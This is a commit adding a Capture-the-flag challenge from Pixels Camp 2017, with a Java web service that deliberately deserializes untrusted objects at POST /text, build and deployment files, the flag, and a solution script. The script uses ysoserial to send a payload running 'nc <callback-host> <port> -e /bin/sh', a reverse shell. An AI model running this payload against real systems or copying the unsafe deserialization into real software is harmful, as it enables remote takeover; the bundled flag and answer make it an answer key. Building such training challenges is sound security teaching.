Add 2017's P100 challenge

Author: poupas

Pwnable/100-HighwayDisplay-Redux/Dockerfile

@@ -0,0 +1,16 @@
+FROM openjdk:8-jre-slim
+
+RUN addgroup --system p100 && \
+	adduser --system --home /p100 --disabled-login --shell /bin/false p100 && \
+	adduser --system --home /var/empty --disabled-login --shell /bin/false --gecos "flag{Rw4btOtmNCytflW9uFMN}" flag && \
+	apt-get update -y && \
+	apt-get install wget curl netcat-traditional -y
+
+COPY ./target/dependency /p100/lib
+COPY ./target/highway-trouble.jar /p100
+WORKDIR /p100
+
+EXPOSE 32100
+
+USER p100
+CMD ["java", "-jar", "highway-trouble.jar", "--listen=8080"]

Pwnable/100-HighwayDisplay-Redux/Makefile

@@ -0,0 +1,31 @@
+
+all: target 
+
+target:
+	mvn dependency:copy-dependencies package
+
+docker: guard-SERVICE_NAME target 
+	sudo docker build -t ${SERVICE_NAME} .
+
+clean:
+	mvn clean
+
+distclean: clean
+
+guard-%:
+	@ if [ "${${*}}" = "" ]; then \
+		echo "Environment variable $* not set"; \
+		exit 1; \
+	fi
+
+install: guard-SERVICE_NAME docker
+	sudo ln -sf "$(shell echo $$PWD)/${SERVICE_NAME}.service" /etc/systemd/system/${SERVICE_NAME}.service
+	sudo systemctl daemon-reload
+
+uninstall: guard-SERVICE_NAME
+	sudo systemctl stop ${SERVICE_NAME} >/dev/null 2>&1 || true
+	sudo rm -f /etc/systemd/system/${SERVICE_NAME}.service
+	sudo systemctl daemon-reload
+	sudo docker rmi ${SERVICE_NAME}
+
+.PHONY: all clean distclean install uninstall tests

Pwnable/100-HighwayDisplay-Redux/README.md

@@ -0,0 +1,50 @@
+P100
+====
+
+(Feels like deja-vu all over again...)
+
+We found that some highway information displays have their APIs exposed
+on the wild Internet. These displays have a single endpoint `/text`
+which returns the current displayed text on GET and allows setting new
+text to display on `POST` (fun!).
+
+From inside information, we also know they have other stuff running on
+the same appliances, like the speed radar software. Well... the radar
+caught us speeding, and we need to prevent the controller from submitting
+our photo back to the mothership.
+
+We need you to hack into the server and fetch us the flag in the `/etc/passwd`
+file.
+
+Flag
+----
+
+`flag{Rw4btOtmNCytflW9uFMN}`
+
+
+Answer
+------
+
+The solution is to POST a serialized malicious object to `/text` to achieve
+RCE. One possible way to achieve this is to use the [ysoserial tool](https://github.com/frohoff/ysoserial)
+
+Check the `solution/solution.sh` script for a minimal answer for this
+problem.
+
+
+
+Installing
+----------
+
+To install locally for testing, just run `make` to build the virtualenv
+with all the necessary dependencies. Then run `p100-runserver.sh` to
+start the service.
+
+For the actual challenge, the service needs to run in a read-only
+Docker container for safety. Run `make docker` and `make install`
+to register it with systemd, then run `systemctl start p100` to
+start it. It will listen on port "32100".
+
+
+Tested on Ubuntu 16.04 x64.
+

Pwnable/100-HighwayDisplay-Redux/p100.service

@@ -0,0 +1,15 @@
+[Unit]
+Description=Pixels Camp CTF P100 Challenge
+After=network.target
+Requires=docker.service
+After=docker.service
+
+[Service]
+Type=simple
+ExecStart=/usr/bin/docker run --name p100 -p 127.0.0.1:32100:8080 --mount type=tmpfs,destination=/tmp,tmpfs-size=107374182400 --read-only --rm p100
+KillSignal=SIGINT
+TimeoutStopSec=5
+Restart=always
+
+[Install]
+WantedBy=multi-user.target

Pwnable/100-HighwayDisplay-Redux/pom.xml

@@ -0,0 +1,64 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+	<groupId>highway-trouble</groupId>
+	<artifactId>highway-trouble</artifactId>
+	<version>0.0.1</version>
+	<name>highway-trouble</name>
+	<build>
+		<finalName>${project.artifactId}</finalName>
+		<sourceDirectory>src</sourceDirectory>
+		<plugins>
+			<plugin>
+				<artifactId>maven-compiler-plugin</artifactId>
+				<version>3.6.1</version>
+				<configuration>
+					<source>1.8</source>
+					<target>1.8</target>
+				</configuration>
+			</plugin>
+			<plugin>
+				<!-- Build an executable JAR -->
+				<groupId>org.apache.maven.plugins</groupId>
+				<artifactId>maven-jar-plugin</artifactId>
+				<version>3.0.2</version>
+				<configuration>
+					<archive>
+						<manifest>
+							<addClasspath>true</addClasspath>
+							<classpathPrefix>lib/</classpathPrefix>
+							<mainClass>camp.pixels.ctf.highway.Main</mainClass>
+						</manifest>
+					</archive>
+				</configuration>
+			</plugin>
+		</plugins>
+	</build>
+	<dependencies>
+		<dependency>
+			<groupId>com.sparkjava</groupId>
+			<artifactId>spark-core</artifactId>
+			<version>2.6.0</version>
+		</dependency>
+		<dependency>
+			<groupId>org.slf4j</groupId>
+			<artifactId>slf4j-simple</artifactId>
+			<version>1.7.25</version>
+		</dependency>
+		<dependency>
+			<groupId>org.apache.commons</groupId>
+			<artifactId>commons-collections4</artifactId>
+			<version>4.0</version>
+		</dependency>
+		<dependency>
+			<groupId>org.apache.commons</groupId>
+			<artifactId>commons-lang3</artifactId>
+			<version>3.6</version>
+		</dependency>
+		<dependency>
+			<groupId>net.sourceforge.argparse4j</groupId>
+			<artifactId>argparse4j</artifactId>
+			<version>0.8.1</version>
+		</dependency>
+	</dependencies>
+</project>

Pwnable/100-HighwayDisplay-Redux/solution/solution.sh

@@ -0,0 +1,9 @@
+#!/bin/sh
+
+# Fetch ysoserial from https://github.com/frohoff/ysoserial
+
+# Expects <callback-host> listening on <port>
+
+java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections4 "nc <callback-host> <port> -e /bin/sh" | base64 |  curl --request POST -v --data-binary "@-" http://p100-ctf-d10e7f04b564847c.pixels.camp/text
+
+# Enjoy your shell

Pwnable/100-HighwayDisplay-Redux/src/camp/pixels/ctf/highway/Display.java

@@ -0,0 +1,17 @@
+package camp.pixels.ctf.highway;
+
+import java.io.Serializable;
+
+public class Display implements Serializable {
+	private static final long serialVersionUID = 7630566514436928811L;
+	private static final String DEFAULT_MESSAGE = "--testing--";
+	private String message = DEFAULT_MESSAGE;
+	
+	public String getMessage() {
+		return this.message;
+	}
+	
+	public void setMessage(String msg) {
+		this.message = msg;
+	}
+}

Pwnable/100-HighwayDisplay-Redux/src/camp/pixels/ctf/highway/DisplayController.java

@@ -0,0 +1,54 @@
+package camp.pixels.ctf.highway;
+
+import java.io.PrintWriter;
+import java.io.StringWriter;
+import java.util.Base64;
+import org.apache.commons.lang3.SerializationUtils;
+
+import static spark.Spark.*;
+
+public class DisplayController {
+
+	public DisplayController(final DisplayService srv, int listen) {
+
+		if (listen > 0 && listen < 65536) {
+			port(listen);
+		}
+
+		get("/text", (req, res) -> {
+			byte[] data = SerializationUtils.serialize(srv.getDisplay());
+			return Base64.getEncoder().encodeToString(data);
+		});
+
+		post("/text", (req, res) -> {
+			String body = req.body();
+			body = body.replace("\n", "").replace("\r\n", "");
+			System.out.println("Got request: [" + body + "]");
+			byte[] data = Base64.getDecoder().decode(body);
+			Display d = SerializationUtils.deserialize(data);
+			srv.setText(d);
+			return "Message updated!";
+		});
+
+		exception(IllegalArgumentException.class, (e, req, res) -> {
+			res.status(400);
+			res.body(e.getMessage());
+		});
+
+		exception(Exception.class, (e, req, res) -> {
+			StringWriter buffer = new StringWriter();
+			PrintWriter printer = new PrintWriter(buffer);
+			e.printStackTrace(printer);
+			res.status(500);
+			res.body(buffer.toString());
+		});
+
+		notFound((req, res) -> {
+		    return "Not found.";
+		});		
+		after((req, res) -> {
+			res.type("text/plain");
+		});
+
+	}
+}

Pwnable/100-HighwayDisplay-Redux/src/camp/pixels/ctf/highway/DisplayService.java

@@ -0,0 +1,14 @@
+package camp.pixels.ctf.highway;
+
+public class DisplayService {
+	private Display display = new Display();
+
+	public Display getDisplay() {
+		return this.display;
+	}
+
+	public void setText(Display d) {
+		this.display = d;
+	}
+
+}

Pwnable/100-HighwayDisplay-Redux/src/camp/pixels/ctf/highway/Main.java

@@ -0,0 +1,29 @@
+package camp.pixels.ctf.highway;
+
+import net.sourceforge.argparse4j.ArgumentParsers;
+import net.sourceforge.argparse4j.inf.ArgumentParser;
+import net.sourceforge.argparse4j.inf.ArgumentParserException;
+import net.sourceforge.argparse4j.inf.Namespace;
+
+
+public class Main {
+	public static void main(String[] args) {
+		
+		ArgumentParser parser = ArgumentParsers.newArgumentParser("highway").defaultHelp(true);
+
+        parser.addArgument("-l", "--listen").required(true)
+                .dest("port")
+                .help("Specify the port where the service should listen");
+
+        int port = 0;
+        try {
+			Namespace ns = parser.parseKnownArgs(args, null);
+	        port = Integer.parseInt(ns.get("port"));
+        } catch (ArgumentParserException e) {
+			parser.printHelp();
+			System.exit(-1);
+		}
+
+		new DisplayController(new DisplayService(), port);
+	}
+}